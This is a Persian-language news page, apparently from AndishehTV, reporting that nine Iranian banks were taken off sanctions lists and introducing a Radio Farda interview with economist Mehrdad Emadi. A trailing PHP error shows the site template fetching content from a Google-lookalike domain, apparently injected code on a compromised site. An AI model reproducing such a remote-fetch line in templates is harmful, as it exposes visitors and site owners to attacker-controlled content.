Wednesday 23 September 2020 / چهارشنبه 2 مهر 1399

جستجو

P7a

AndishehTV

ATV Frequenter

sanction lifted 9 iran banks

نه بانک ایرانی رسما از تحریم‌های بین المللی خارج شدند. پیش از این و در رابطه با برنامه هسته‌ای ایران ۱۲ بانک اصلی ایران در لیست تحریم‌ها قرار گرفتند.

به گزارش خبرگزاری‌ها ایران، بانک مرکزی و بانک های ملی، ملت، تجارت، صنعت و معدن، توسعه صادرات، پست بانک، بانک سپه و بانک رفاه کارگران از لیست تحریم ها خارج شدند.

آیا این بانک ها قادر خواهند بود در کوتاه مدت به مسیر فعالیت معمول در عرصه اقتصادی بازگردند؟

مهرداد عمادی، اقتصاددان مقیم لندن با رادیو فردا در این مورد به گفتگو نشسته است.


Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311